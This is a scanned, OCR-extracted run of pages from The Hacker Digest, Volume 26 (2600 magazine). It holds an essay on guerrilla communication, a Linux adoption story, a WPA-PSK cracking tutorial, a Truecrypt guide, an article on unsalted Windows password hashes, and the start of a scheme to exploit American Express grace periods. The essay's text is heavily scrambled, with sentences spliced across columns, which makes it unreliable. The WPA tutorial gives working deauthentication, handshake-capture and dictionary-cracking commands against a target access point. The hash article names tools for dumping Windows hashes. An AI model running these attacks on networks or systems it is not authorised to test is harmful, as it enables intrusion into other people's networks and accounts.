thanking us for our service. We wanted to address the hysteria of the post-September 11. Media is the strongest political.that’s us .Hacker Perspective
Johannes Grenzfurthner monochrom
The Medium is the Mess-Up or: How to Hack the World
Most of us know and understand that the major power of today’s world is the media. So if you want to do anything about it. So long as you can’t download your iPhone. Mocking strategies are especially useful in attacking a single player like a multinational by trying to stain his image and tactically embarrass him as a warning to stop the evildoing. our Creative Commons tracks.
THE HACKER DIGEST . Unlike guerrilla warfare. That can be done with something called guerrilla communication. It’s (as always) about controlling the means of production.Western culture . Small talk. This could be a personal interpretation of guerrilla communication. And most of us do not own significant parts of it. Most of them have something to do with mocking or mimicry of official communication. such as class. and. Advertising is inherently public and something that tries to give instructions can be obeyed or disobeyed by not playing by the rules. I’m part of the political art/tech group monochrom. These tactics are adapted from classical guerrilla warfare (which already made use of guerrilla communication against its enemy’s communication system). 2001 attacks about biological warfare and the media coverage about bird flu. And since the media is not nature but culture . economic.

wouldn’t want to experience because it’s dangerous. because it’s rather naïve: it tends to be the best products which are advertised because they are advertised. It should be clear that guerrilla communication doesn’t have a military goal in the classic sense of destruction. Therefore. Punk. These people developed strategies to provoke and challenge society. are masters of the typical company spokesmen body language and tone of voice. Brazil in 2002. His art piece dealt with the mistreatment of Taiwanese people in mental asylums. and recipients. What they do is no longer parody.and create a bunch of diplomatic problems . etc.are you a hacker? One of the basic strategies is faking things: press releases by political parties or companies. You could sabotage instructions by misinterpreting them and acting dumb. Through the implementation of this ironic mechanism . but nobody wanted to inform him. Georg Paul Thomann proved to be a potent payload for political content.I guess they just didn’t know how to google . What’s new about all of this? Nothing. Guerrilla information. A “t” from Austria (equals Aus ria). It means that you use affirmation to a degree that goes beyond the conventional to show what something really means . However.. Communication guerrillas do not intend to occupy. One Taiwanese newspaper headlined: “Austrian artist Georg Paul Thomann saves ‘Taiwan. The street is synonymous for public space and the humdrum surface of society.’” A non-existing artist saves a country that shouldn’t exist? Well. fuck our nation). The artist Chien-Chi Chang was invited to the Biennial as the representative of Taiwan. The earliest forms of modern guerrilla communication can be found within the WWI art scene. to implement their political agenda into the public space. that was a bad time!) gave us concerns about acting as representatives of “our nation” (well.Taipei. when a group of international artists and deserters met in Zurich on neutral Swiss ground to launch the Dada movement. One of our own exploits was started in 2001. but Taiwan’s name tag was removed by people working for the administration. But we decided to deal with the problem by creating the persona of Georg Paul Thomann. You could say that it’s all about playing with representation and identity. Oh wait . I love postmodernism.VOLUME 26
I guess. But moreover. But this fact can be a powerful ally. so it was very import for him to be the official Taiwanese representative. The media reported about Thomann as the official Austrian representative . it was considered the perfect
142
. for example. You see.” For Chien-Chi Chang this was very irritating. And after some time Chang could remount a trashy new “Taiwan” outside his room. the communication guerrilla doesn’t claim the invention of a new politics or the foundation of a new movement. websites. But standing on the shoulders of earlier avantgardes.” So we started a solidarity campaign and began to collect letters. interrupt. laying the foundations for such radical art movements as The Situationist International. We started some research and discovered that China had threatened to retreat from the Biennial . an irascible.but also to act out the habits and conventions of your enemy. Chang was very pleased and several reporters took pictures and took notes. The Yes Men. of course. occupation. even your own life.THE HACKER DIGEST . but mimicry.” Most of the work was writing his 500 page biography. as well as for personal habits. You could say that guerrilla communication is not trying to destroy the dominant codes but rather to deconstruct and strategically abuse them for its own purposes. and Neoism. Information and political education are completely useless if nobody wants to listen.even the catalogue included the biography of the non-existent artist . and to start reclaiming the streets. He tried to get information. alienation and identification. But it doesn’t aim to destroy the codes of power and signs of control. Rather. suppression. mimics classical marketing tools and knowledge. it is direct action in the space of social communication. My group monochrom was chosen to represent the Republic of Austria at the Sao Paulo Art Biennial in Sao Paulo. but twists it in the opposite direction. or destroy the dominant channels.and so our strange art avatar suddenly was a cultural ambassador of “our country. Several Asian newspapers reported on the performance. for example.” And all the members of monochrom were his technical support team. It’s about putting special groups like the people of Bhopal on the map of global consciousness. codes. And the Canadians really didn’t need all three “a’s. They focus on detouring and subverting the messages transported. guerrilla communication is a versatile practice of cultural resistance. controversial (and completely fictitious) artist of “longstanding fame and renown. senders.if the organisers of the Biennial were thought to be challenging the “One-China policy.we tried to hack the philosophical and bureaucratic dilemma attached to the system of representation. The country’s name on his cube was replaced overnight by new adhesive letters: “Museum of Fine Arts. Guerrilla communication doesn’t focus on arguments and facts like traditional communication. That goes for factory workers as well as for all you white collar supremacists: why not use the CD drive in your office computer as a coffee cup-holder? It’s got a tinge of freedom to it which you. This works for press releases and interviews. it inhabits a militant political position.” etc. It’s the freedom of something that exists beyond the mere functionality of the way it was intended. It is merely continuing an exploration of the jungle of interaction processes. or extermination. the rightwing political climate in Austria (fuck.

Its fundamental strategy is to misappropriate images. At the same time the squatters’ movement emerged: Post-bourgeois artists attacking actual private property as well as non-material cultural property. are still around in the guerrilla communication movement of today. but also how the code .the way in which the media shapes and constitutes reality . for counterinforming people. we promote a concept called “Sculpture Mobs. oblivious of the fact that it was spreading a hoax. and therefore can be overwritten in the same way you can overwrite an advertisement.” Art is the place where things might be reflected. the Situationist Movement defined a form of art called “détournement. rather. Most activists came from a classical art or journalist background but had reached the conclusion that nobody really listens when you speak in the traditional art space.come to believe that white suburban males are meant to rule the world without even once spending a thought on it? How is the sexist and racist and classist subconsciousness of the liberal society shaped through the media and access to it? Any suggestions? I’m sure you won’t have any because it is just the nature of the capitalist and bourgeois media flow. What is lacking is a concise theory of what bourgeois society is like and what should be attacked by us.shows no respect for the fact that the media and the public space as well as the images and cultural frameworks we live in belong to the bourgeois. As long as you simply play around with the media . Why under five minutes? Because that’s the time you have if you set up a sculpture . And that is what must be hacked and changed to make it visible and questionable. In the 1970s. but as a form of irritation. A popular slogan suggested people “invent false facts in order to create real events. too.the very structure . in shopping malls! It is time to create DIY public art! Get your hammers! Get your welding equipment!” So we started to host training sessions and we began teaching interested people how to erect public sculptures in under five minutes. they came up with the post-modern idea that social structures are texts. Even if people would go. You have to know how everything works . Pirate radio stations appeared and hijacked radio frequencies. counterculture split into a more traditional Marxist wing consisting of small parties and groups that wasted a lot of their precious time and beautiful youth to fight each other. But that should by no means be the ultimate goal.let’s say at a Wal-Mart parking lot . California.even as a media pirate or hacker you are still part of the system. we created a political illegal public sculpture called “The Great Firewall of China” at the Google Campus in MountainView. and radio frequencies and shift them to different contexts.” To quote our own pamphlet: “No one is safe from public sculptures.” So.just like hackers not only know what a website is and what it looks like and how it works.THE HACKER DIGEST . Otherwise. A great part of the movement has made it to the top of our society and its institutions . Art is a special task and a special place for special people.’ Unchallenging hunks of aesthetic metal in business parks.not as a service (as it is to the bourgeois elite art consumer). roundabouts. And we set up various realistic looking antitank obstacles in inner districts of various cities. This was one of the many starting points of guerrilla communication as well as the so called “reclaim the streets” movement which includes funny yet irritating activities like Flashmobs . But what do we know about the cultural code of messages? Do we really understand how.and Adbusters.VOLUME 26
stage for informing people or. Guerrilla communication . those endless atrocities! All of them labeled ‘art in public space. we will just be going round in the same old circles as the history of guerrilla communication clearly shows. The post-bourgeois artists tried to bring art back to the people . As part of monochrom. it becomes clear that these strategies were an early form of viral marketing for the rebels themselves. We named these pieces “New Kids On The Road Block. but that amounts to nothing since it’s removed from everyday life. That’s why we need to hack into media and change its message flow and the stereotypes it communicates. And hacking is a means of guerrilla communication because it is a hostile assault from outside the system trying to find a way to change or manipulate it from within. In France.works. Graffiti was an important weapon of that movement to overwrite the text of the city. guerrilla communication is hacking. Only once something can be seen will we realise what has been invisible before. for example. Looking back at the guerrilla communication movement.” As part of the project. heterosexism is cemented in our society via texts and images? What about cultural stereotypes? How do we .like the former German minister of foreign
143
.unlike everybody else . Plenty of their strategies. words.before “security arrives. in a certain way. In its best and most far-out moment.” It means that you roam aimlessly around the streets and take what you find and then do something with it. Your average guy does not go to exhibitions or concerts and rarely sees counter culture media. like throwing pies at celebrities.or at least some of us . They too started working with fake information and actions distributed via the bourgeois media. they would consider what happens there to be “just art.” but they too made real objects and did cultural piracy stuff like pirate editions of the socialist classics or handing out counterfeit subway tickets. You have to change the political economics of a society.

N the same quick Ubuntu tour that I gave my previous “apprentices” and she took to it fast.but it doesn’t work anything like Windows. He holds a professorship for art theory and art practice at the University of Applied Sciences. The old Dell GX 260 was in dire need of a new operating system and. It will either be Windows Vista. or Suse. There was no reason why the hardware shouldn’t work right. or Ubuntu Linux. communism. I sat down with the wife’s parents. He is head of Arse Elektronika (sex and tech) festival in San Francisco and co-hosts Roboexotica (Festival for Cocktail-Robotics). take a copy of Ubuntu. I acquiesced for the extra hours and left home
bound for an elderly stranger’s house. He instructed me to take company copies of Microsoft Office XP and Windows XP Professional. once a notorious player in the huge Sponti-movement in Frankfurt before turning into a complete butthead.. About 6 months ago. popular culture studies. do me a favor and erase all the information I just gave you. it is all about success. and has an HP computer that was made within the last year. and partly because working with computers is far from their forte. N is in her mid 70’s. We will call her Mrs. and asked her what types of problems she was having.. media theory. performance. cultural studies.at/english/
Granny Loves Linux!
by Metaranha
Those who are educated in a higher level of computer use (i. I was only told that the computer was slow. but will instead offer interesting insight into two people who have chosen to live with Linux and are doing very well in their life after Windows. He founded monochrom (an internationally acting art-
tech-theory group) in 1993. but the question of which demographic to target with Linux and its variants is a little bit hard to hit.monochrom. It’s not going to be hard to convince her to use it full time. director. My question was answered with the appearance of the Windows Vista loading screen.” I said. Mrs. She told me that she didn’t use the computer for anything besides Internet access. It didn’t take long at all for both of them to pick up the computer and do what they needed to do. Graz.
144
. Success is what you want.VOLUME 26
affairs. partly because they have to interact with them so frequently at their workplaces. readers of 2600) are already aware of the majesty and power of Linux. http://www. and DIY researcher. they were forced to give in to the demands of the modern world and asked me to set up my wife’s old computer for them.THE HACKER DIGEST . humour. having no extra Windows disks around (coincidence?). Recently. Austria. science fiction. and have her give it a try. My wife’s parents are in their mid 50s and take a hard line against using computers at home. “Look at it this way. and all of the programs you may need to use in the future are free. One week later. sex. Slowly.. So in the end. arrived at her house in the afternoon. but I didn’t know if I had sold it well enough yet. The point here is to not underestimate the power of the casual user and elderly demographics.” “Free you say?” she asked. I took my Hardy Heron live cd. along with the operating system.” I gave Mrs. Joschka Fischer. activism. Being that we’ve got a recession on. pictures and writing documents from time-to-time. writer. you won’t have to worry about viruses or spyware. I installed Ubuntu Linux on my mother-in-law’s computer. Their computer is still working as good as it was the day I installed Linux. N’s love for Linux is still rolling strong. With Linux. N to take a seat and see what she thought. Mrs. N. so I threw in the live cd and asked Mrs.
Johannes Grenzfurthner is an artist. Maybe not sharing the information would be the utmost guerrilla communication act. and the debate about copyright. my boss asked me to take a look at his mother-in-law’s computer.. “It works a lot like Windows. and followed up with “. you’re going to be learning something new anyway. I suggested that they give Linux a try. postmodernism. isn’t it? If so.e. So the next time you visit grandma. the rest of the world is coming to understand those factors as well. and they have had very minimal problems with using it.” and away they went. Finally. Recurring topics in his work are: contemporary art. gave them a very quick “how to. I told her. philosophy. This article will not try to make any wild suggestions on who to give Linux to. and you’ll save your dear old granny the headache of using and maintaining Windows when all she wants to do is see pictures of her family and talk to you.

it is very possible to recover. The computer asks the AP for association 4. or key) is mixed or “salted” with the wireless network name (aka the SSID “Service Set Identifier”). For a WEP crack. I would like to share with you today a method of cracking a WPA-PSK password on a wireless network. in WPA the only thing that will enable us to even start the attack at all is what’s called the “four-way handshake” between the client and the AP.wi-fiplanet. Unlike WEP. it could take hundreds of
145
. The computer asks the AP for authentication 2.html). vulnerable to various types of attacks. it will probably be found when we implement a dictionary attack. and http://sid. This plain text password (also called the Master Key. All wireless networks transmit data packets through the air. aka “Personal. I utilized a wordlist I found within Back Track 3 for this tutorial. commonly referred to as a PMK (Pairwise Master Key). It is well documented that WEP is. you will be denied at step 2 without the password. generally ranging from 8-63 ASCII characters (although it can be 64 hexadecimal digits).) The method of cracking a WPA password is slightly different than that of cracking WEP (Wired Equivalent Privacy).html.html.THE HACKER DIGEST . The single most important thing to remember when attempting a dictionary attack is this: The attack will only be as good as the wordlist/ dictionary file you use. If a password is aardvark. If the password is aardvark1.com/tutorials/ ➥article.xs4all. First. The WPA password can only be found if there is an exact match in the dictionary (aka wordlist) you are using. by design. a little background on WPA-PSK.remote-exploit ➥. The AP responds: OK.” This hash value. If the password is a common word in the dictionary.PSK (Pre-Shared Key). you will not crack the password. though we could attempt a brute force attack. The main tools utilized are Back Track 3 (aka BT3. and the Aircrack-ng suite (a set of tools for auditing wireless networks.rstack. The more specific term for what happens during the handshake is called EAPOL (Extensible Authentication Protocol) authentication and. A WPA-PSK key is a required minimum of 8 characters long and.org/ ➥ H O W T O /8021X-HOWTO /intro. and is what enables us to perform a WPA crack.org/backtrack_download.” option to secure their wireless networks. and for an exacting explanation of what occurs during the four-way handshake process.pdf) Most wireless networks use what’s called an Open System Authentication to connect to an AP (Access Point). (Visit http://packetstorm ➥security. (For more on how hash functions and keys work. In simple terms. There are many wordlists and dictionary files available out there. a live Linux security distribution freely available at http://www.php/3667586 for details on different types of wireless protection. and will essentially be used to allow for the encryption of all network traffic. (Please go to http:// ➥ www. see http://www. If the password is not in the wordlist. you are now connected
What’s known as a “four-way handshake” occurs during this connection process when utilizing WPA.nl/~rjor ➥is/wpapsk. WPA is basically a security protocol and the PSK is a password/key. And therein lies the weakness in WPA: The human element. the same dictionary attack will most likely fail as the “1” is not likely to be found in most wordlists. you’re authenticated 3.org/pres/0810 ➥_BACon_WPA2_en. The main method of attack with this type of wireless encryption is ultimately a standard dictionary attack. we would need to capture a large number of these packets (usually at least 40k-85K) which contain the IVs (Initialization Vectors) necessary to break the WEP password.VOLUME 26
by Mister Cool
WPA/WPA2 is a leading method of securing one’s wireless network.) A WPA key is only as strong as the user who sets out to make it. http://tldp. The steps are: 1. Many home and small office users today utilize the WPA (WiFi Protected Access) . to create a 256 bit value called a “hash. The AP responds: OK. The Pre-Shared Key is a password or passphrase created by the administrator of the network.org/Crackers/wordlists/ for a robust selection of freely downloadable wordlists. Collecting more packets after we capture this “handshake” will not increase the chances of successfully recovering a WPA password. if WPA is in use. is shared between an Access Point and a client. included in the live CD pre-installed).

For a sample brute force time calculator visit http://lastbit.pcmag.asp# and http:// ➥s e a r c h m o b i l e c o m p u t i n g . Let’s try our hand at cracking a WPA-PSK encrypted Wireless Network with this simple exercise. WEP.com/sDefinition/0. A Toshiba Satellite L35-S2151 Laptop as the attacking PC (any computer with a supported wireless card should work) 2. We generally want to match this to the channel of our target AP. type: airodump-ng ath0 This will show all the networks in range. second icon in). there were 3 wireless networks found.00. and open a command shell (lower left tool bar. as the method to recover these passwords is identical. p h p ? i d = c o m p a t i b i l i t y _ ➥drivers) 3.com/ ➥pswcalc. Deauthenticate the client from the AP using aireplay-ng and. We are in luck as we have an associated client on the “linksys” network to target for our attack. to stop the wireless card at the command prompt type:
airmon-ng stop ath0
Where ath0 is our interface (Atheros wireless card). Find a client associated with the target AP. and start a capture file with airodump-ng 4. depending on factors such as the power of the computer.org/do ➥k u . upon client reconnection. ESSID (Extended Service Set Identifier) = Network Name (sometimes referred to simply as an SSID). and special characters. usually: OPN (open). Injection is useful to create network traffic if the network is not particularly busy.com/ ➥encyclopedia_term/0. 1) Set your card in Monitor Mode. ➥ WEP WEP NETGEAR BSSID STATION ➥ PWR Rate Lost Packets Probes 00:18:F9:1A:13:30 ➥ 00:12:50:47:1A:DA 32 ➥ 54-54 0 15 BSSID
➥ Beacons ➥ MB ENC
Our goals:
Now to the Good Stuff:
Where. Next. upper and lower case letters. In this particular example I used: 1. usually TKIP with WPA and CCMP with WPA2. capture the WPA handshake 5. f 2) Now. (For details on CCMP.openxtra. #/s CH CIPHER AUTH ESSID 00:18:F9:1A:13:30 35 ➥ 244 4 0 6 54 ➥ WPA TKIP PSK linksys 00:1D:7E:2C:E7:BF ➥ 23 109 3 0 11 ➥ 54 WPA2 CCMP PSK 2600 00:1F:90:E3:19:26 7 ➥ 18 1 0 1 54. An Atheros pre-installed wireless card (model AR5005G .sid40_ ➥gci1319465. This monitor mode also allows you to optionally inject packets into a network.WPA2. Use the capture file containing the handshake in aircrack-ng to find the key Start your computer with the Back Track 3 Live CD.co. The output will look something like:
CH 3 ][ Elapsed: 52 s ]
➥ [ 2009-01-18 21:28
PWR #Data.asp. Injection is not absolutely needed to capture the handshake. (See http://www. The Back Track 3 Live CD 4.CCMP). ENC = the encryption type. many other cards are supported.networkworld. CIPHER = the cipher used (WEP. but I have found it helps in finding associated clients. A target AP transmitting through a Linksys WCG200 Cable Gateway 5. WPA .html) WPA and WPA2 personal are essentially the same for our purposes.
146
.uk/articles/wpa➥vs-80211i.VOLUME 26
years to crack. notably: BSSID (Basic Service Set Identifier) = AP MAC address. visit http://www. The “6” at the end is the channel the card will operate on. t e c h ➥target. numbers. The main difference between WPA and WPA2 is that WPA uses the older TKIP (Temporal Key Integrity Protocol) encryption type scheme.html?page=1 and http:// ➥www. Sniff for networks with airodump-ng 3.THE HACKER DIGEST . even at that length. while WPA2 utilizes the newer AES (Advanced Encryption Standard) encryption scheme which employs CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). see http:// www.aircrack-ng. CH = channel of AP (note the CH in the upper left will be hopping. Dell Inspiron 1000 as the client associated to the AP (aka the “client’) 1. AUTH = authentication used (we’re looking for PSK).. As you can see.2542. to see what networks are out there.com/ ➥columnists/2006/091106-wireless➥security.t=AES➥CCMP&i=37582. The output should indicate the interface ath0 is now in monitor mode. this is showing the channels that are being scanned for networks). to start the wireless card in monitor mode type:
airmon-ng start wifi0 6
We must use “wifi0” instead of “ath0” as we are using the madwifi-ng drivers which are specific to the Atheros cards.php for a more detailed explanation of WPA vs.TKIP. WPA2) Now. This is necessary to allow your PC to listen to every wireless packet. Station = client MAC address. First. MB = Network Speed (54 is wireless G). Set the wireless card in Monitor Mode with airmon-ng 2.00.

once the command runs.com/faq/ for more details on how these tables work. (See http://www. This is why the Church of WiFi has precomputed hashes in what they call a “special” Rainbow Table (actually a PMK lookup table) against a 172.net/projects/ ➥WPA-tables/ for more information on these tables.txt. -w = tells the program to run a wordlist. The only caveat is that the time must be spent to do the initial pre-computation.grc. you should make your password something not found in a dictionary and somewhat random. We will attempt to deauthenticate the client from the AP and. it can be near impossible to break if the password is random enough. Further.” These tables employ a time-memory trade off. try one of these out for maximum security (https:// ➥www. And if you use “password” as your key. This pre-computation drastically decreases the amount of computing power and time needed to find the correct key. If the network name (SSID) was “linksys.renderlab. If the key is found the output will read similar to:
KEY FOUND! [ password ]
In this case the WPA-PSK password was “password” and we cracked it! (For more detailed information on the entire aircrack-ng suite visit http://www. so that they do not have to be calculated during a dictionary attack.THE HACKER DIGEST . A successful capture of the handshake will show in this case as: [WPA handshake: 00:18:F9:1A:13:30] in the upper right corner next to the date and time of our original output screen. but this can be any number. You will eventually get the interface and AP on the same channel.000 common SSID’s.aircrack-ng. 4) Now. keep trying the command. it’s much easier to do the calculations for the hash values once and store them for later use. However.) Note that a traditional Rainbow Table will not work to crack a WPA password. as the original hash value is salted with the SSID.000 word dictionary for 1. You may have to enter the command more than once. While not impenetrable. and the cracking process can take hours.htm for more details). than it is to calculate them every time they are needed. it does not always immediately capture the handshake.cap -w ➥/pentest/wireless/aircrack-ng/ ➥test/password.” then the same pre-computed hashes will not work. The main lesson to be learned is that if you use this type of encryption.VOLUME 26
Optional: If you wish to do an injection test open a new shell and type:
aireplay-ng -9 ath0
I often use this as it sometimes causes associated clients not showing in our output to show up. The captured information will be saved to our capture file. A Rainbow Table is a lookup table (similar to a multiplication table) that can be used to recover the plain-text password from a password “hash. and your network will remain relatively secure. we need to capture the handshake. and ath0 our interface. the “linksys” network. too high a number may cause the client to fail to reconnect!). 5 = the number of tries for the deauthentication attack (I have found good success with 5.org) Sometimes the dictionary files themselves are
huge. when it reconnects.” If the SSID was “2600. While these files are rather large ranging from 7GB-33GB. -c = client (Destination) MAC address. sometimes the output will indicate that the interface (ath0) is on a different channel than the AP.freerain ➥bowtables.” and the dictionary file was “wordlist.” the pre-computed hashes would only work utilizing another SSID of “linksys. There are several random password generators out there. but suitable for our testing purpose. Be patient. This is easily accomplished by using either coWPAtty (included on the BT3 CD. even days! But the computations can be sped up by pre-computing the original hash value (the PMK we discussed earlier). this is just a simple penetration test of WPA-PSK encryption. --bssid = target AP MAC Address. Open a new shell and type:
airodump-ng -c 6 -w capturefile ➥ --bssid 00:18:F9:1A:13:30 ath0
Where -c = channel of the AP. -w = the capture file (any name will do. If this is the case. The output will look almost the same as our original output above. located within the “Home” icon on the desktop.) In conclusion. you will get as part of the output message: Injection is working! 3) Next. see http://wireless ➥defence. we want to focus on our target AP. This dictionary file is not very big.net/wpa-pskgen/). A set of hashes can only be pre-computed for one specific SSID at a time with any given dictionary file.com/passwords. -a = AP MAC address (bssid). then you might as well not secure your network at all!
147
. In this case. If successful. in this case “capturefile”). they can dramatically decrease the time needed to find the correct password. and / pentest/wireless/aircrack-ng/test/password. Simply put in reference to these tables.htm or http: ➥//www.lst
Where capturefile-01.cap = the capture file. we will capture the handshake! Open a new shell and type:
aireplay-ng -0 5 -a 00:18:F9:1A:13:30 -c 00:12:50:47:1A:DA ath0
Where -0 = the deauthentication attack. 5) Now for the crack! Open a new shell and type:
aircrack-ng capturefile-01. (See http://www.org/Contents/coWPAttyMain ➥.kurtm. in that the potential hashes are all pre-computed.lst = the location of a wordlist that is included in the aircrack-ng suite for testing. and of course ath0 = our interface. or using a “special” form of Rainbow Table. For now. but with just the one AP showing.

the higher the impact on system performance. I started out not knowing much about hard disk encryption. and Twofish. due to a pipelining effect that happens to the read and write operations. launch Truecrypt. open source disk encryption application from http://www. if you’re feeling paranoid. is easily accessible to any common thug if you save your login information in your browser. RIPEMD-160 (default) will do. or OS X. After installing. The only real change you will see is a pre-boot environment that will appear after the BIOS screen. you can choose to either encrypt just the Windows boot partition or the entire physical disk. asking you to key in your password and unlock the disk. Some users even report a slight increase in performance. Using a Trinity Rescue Kit CD. It is easy to use and is capable of encrypting your entire hard disk from start to finish using several standardized encryption algorithms including AES. system performance is almost unaffected. simply put. interfacing with different software vendors.” At the first screen. An extra layer of protection.php. a Windows password can be hacked in less then five minutes. Since being introduced to 2600 a few years ago by a close friend. I’d like to focus on another piece of software called Truecrypt. Next. will be indistinguishable from random data.THE HACKER DIGEST . essentially wrapping each block of data with three different layers of encryption. At the next screen choose whether or not you have multiple operating systems installed and move forward. At my work. If you use Windows and think your Windows password will save you. Choose the entire disk if you have 2 or more partitions and want to encrypt everything. Keep in mind. but for this article I will just show you how easy it is to encrypt your hard disk. which means no worries of hidden back doors for Big Brother. I was recently handed the project of devising a solution to encrypt the hard disks of all our portable users. choose a password that you will use to unlock
148
. it seems we are hearing about another staggering amount of customer information that was lost and compromised due to a laptop theft that could have been prevented by the simple use of disk encryption. Depending on your computer setup. It essentially wraps each block of data on your hard drive using an encryption algorithm which is virtually unbreakable. Serpent. ➥truecrypt. your computer will boot as normal. the more layers you use. but this changed very quickly. you can choose a “normal” or “hidden” encrypted partition. with laptops and portable devices easily available and easily stolen. For now let’s go with “normal. Their corporate products are very good and they also offer a personal version for $120. Truecrypt is a 100% free. download the installer from http://www. I’ve become very interested in security and related matters. This is where you can choose which algorithm(s) you want to use. To begin. select the “edit” menu. if you think you need it. so you can imagine how thrilled I was when this project was handed to me. the difference being that a hidden encrypted partition. its free! The complete source code is available for download from http://www. choose your flavor of operating system. think again. This should be something that everyone with a laptop has installed. Truecrypt stores the encryption keys in RAM and decrypts the data on the fly. including portable USB drive encryption. While losing your laptop sucks. Next. Contrary to that. but is accessed through websites that require a login. I know some of you will say that hard disk encryption really kills your
system’s performance. Almost every day. For the Hash Algorithm. Information that is not even stored on your laptop.VOLUME 26
by GhostRydr
In today’s society.org/ ➥downloads2. hard disk encryption is no longer optional.truecrypt. having your identity stolen really sucks and can cost you even more. once your drive is encrypted. The website has complete documentation on many other features. Now you should be at the Encryption Options window. choose whether you want to encrypt the host protected area.org/down ➥loads. Microsoft.php. there is a lot more personally identifiable information on your laptop than one might think. And best of all. Using one layer should be sufficient for most. Truecrypt will allow you to use up to three different algorithms together. For most people.truecrypt. and will cost you several hundred dollars. eventually lead me to choose PGP’s Whole Disk Encryption. select the option you think will work best. Linux. your data is safe from almost any attack method. However. My research took me down several different paths and. Data is unencrypted as it comes off the disk and then encrypted again before it ever touches the disk. AES is the default and is very secure.” Next. and then select “encrypt system partition/ drive. then download and install the package. Once this is done.org/. However. The install is very simple and.

the operating system calculates the hash of your input and compares it to the stored hash. The salt is then stored with the hash value. but depending on how sensitive the information you store on your laptop is. Sixth Edition. Truecrypt will reboot your system to ensure everything works correctly with the pre-boot authentication. The default “none” will be suitable for most. When you log in. Is it possible that Microsoft made such a stupid. they did. and George Kurtz. laptop anti-theft devices are still a good idea. Now the stored file contains hashes. A 40GB drive on a Pentium 4.waraxe ➥. this website: md5-hash-online. Remember that no single security method is 100% secure and security is best applied in layers. That’s not safe! An attacker could pre-calculate the hashes of many common passwords and use that table to recover the passwords. To make hashes safer. which is not necessary. Once this is complete. Truecrypt will not allow you to continue without creating a rescue CD. you may want to choose a more secure method. Once you’ve burned the rescue CD and verified it with Truecrypt. Shouts to Rob for getting me hooked on 2600 and making this possible! See you back on The Rock!
Microsoft. Joel Scambray. he or she must reverse them to retrieve the original passwords. including cable locks. 3GHz.us. key in the password you specified during setup and boot into your OS. At the next prompt. the operating system appends the salt to your input. With that in mind. as shown in Table Four. and even laptop lockers. as shown in Table One. was about 35 minutes. but very difficult to reverse. there is no easy way to know
What is a salt?
Hashes make stored passwords safer. as I will explain and demonstrate. When you log in. irresponsible error? Sadly. designed so that it is easy to calculate. and compares it to the stored salted hash. instead of cleartext passwords. by Stuart McClure. the operating system compares your input to a stored password. move your mouse around to help randomize the encryption keys. Upon reboot. Please Salt My Hash!
by Sam Bowne
The excellent book Hacking Exposed. the hash is the same. but be sure to use common sense when choosing a password. But there’s a weakness in this system. random “salt” values are appended to the password before hashing it. it can be restored using the CD. One popular hash function is MD5. At this point. Even though “Joe” and “Lucretia” have the same password.THE HACKER DIGEST . If the password is stored in a file. click next. contains this terrifying statement: “All Windows hashes suffer from an additional weakness: no salt” (from page 184). Click next to see the encryption keys and then move on to create a rescue CD. The time it takes to fully encrypt your hard disk will depend on the size of your disk and the system specs.
Table Two: Hashed Password Storage
Username ------------Administrator Amir Joe Lucretia
Password Hash -------------------------------c953ef6978d4525b35620e9f70234aa9 e6078b9b1aac915d11b9fd59791030bf 5f4dcc3b5aa765d61d8327deb882cf99 5f4dcc3b5aa765d61d8327deb882cf99
Cleartext password storage
Table One: Cleartext Password Storage
Username ------------Administrator Amir Joe Lucretia Password ---------zaphod opensesame password password
If an attacker steals the hashed passwords. tracking software. your data will be secured and your entire hard disk will be encrypted. If the Truecrypt boot loader ever gets damaged after you have encrypted your disk. calculates the hash. A “hash” is a way to scramble data. as shown in Table Three. When you type in a password to log in. Select which level of “wipe mode” you prefer. Compare the hashed passwords for “Joe” and “Lucretia”–since they both have the same password of “password”. an attacker can steal that file to learn all the passwords–a very insecure system. which you can calculate online at
Password hashes
149
. as shown in Table Two. The software will recommend using a 20 character password. the test will complete and the encryption process will begin.VOLUME 26
the disk before the operating system loads. To test the system before it encrypts the disk.

As you can see in Figure One. His website is http://samsclass. and Windows 2000 Professional. the hashed values are the same for "Joe" and "Lucretia".html to dump the hashes. I tested this on Windows 7 Beta (32-bit). To find out. just click on the "Cracker" tab. the consumers.
Conclusion
About the author
Table Three: Salting and Hashing Passwords
Username ------------Administrator Amir Joe Lucretia Password ---------zaphod opensesame password password Salt ---WM 45 q2 2r Password+Salt ------------zaphodWM opensesame45 passwordq2 password2r Hashed Password+Salt -------------------------------759e9786a86814820d19a8d4b642443a c559d397235a44bf906d4f86cdd3e1a9 984e1b8949abbd846399e38d0f2cae81 55d1776bb284bbba75ddb31e3480b000
Table Four: Salted and Hashed Password Storage
Username Salt:Salted Password Hash
------------Administrator Amir Joe Lucretia
-------------------------------WM:759e9786a86814820d19a8d4b642443a 45:c559d397235a44bf906d4f86cdd3e1a9 q2:984e1b8949abbd846399e38d0f2cae81 2r:55d1776bb284bbba75ddb31e3480b000
150
. and click "Add to list".
http://swamp. This is a shameful security error on Microsoft’s part. one for each possible salt value.net/) to gather the
How does Windows store passwords?
The statement in the “Hacking Exposed” book is correct: Windows does not salt its password hashes. it/cain. Attackers can’t make a dictionary of password hashes now. unless they make thousands of dictionaries. Sam Bowne teaches Ethical Hacking and other classes in the Computer Networking and Information Technology department at City College San Francisco. How can Microsoft continue to use a system which has been obsolete for 30 years? We. and the hash for "password" was identical in all cases. need to demand more. which came out in 1975 and 1979. I also confirmed that the hash is the same for a local account on a Windows 2008 Server Datacenter 64-bit machine. right-click the center of the window.foofus. Windows XP Professional (32-bit). I made the accounts shown above on a Windows 7 Beta machine.VOLUME 26
that from the salted hashes. The Unix “crypt” man page says this feature has been included in Unix since versions 6 & 7 of AT&T Unix. Windows Vista Business (32-bit).info/. To do that. Then click "Next". I hope that this article may help to shame Microsoft into doing better work. using fgdump (from
hashes. and needs to be corrected.THE HACKER DIGEST . Then I used the free program "Cain" from oxid.

check your balance online and do some quick arithmetic to determine if you’ll have enough cash by the due date to pay in full.
Amazing Grace Period:
amount of money that you are short to the same card. Now here’s the cool part. The purchase that you made will be included in the next billing cycle but. though. creating a mismatch between payment cycles! Keep in mind. This step must be done with sufficient time left to allow for the return credit to hit your account before the grace period ends. Walk into a store with a good return policy and charge something that costs at least the
Step 1: Determine how short you are for the month
Step 5: Pay your bill “in full”
Step 2: Buy something
The Next HOPE
More than 100 DVDs are now available at the 2600 store store. The following is a way to exploit this grace period.VOLUME 26
How To Get Free Loans From American Express
by Bavs
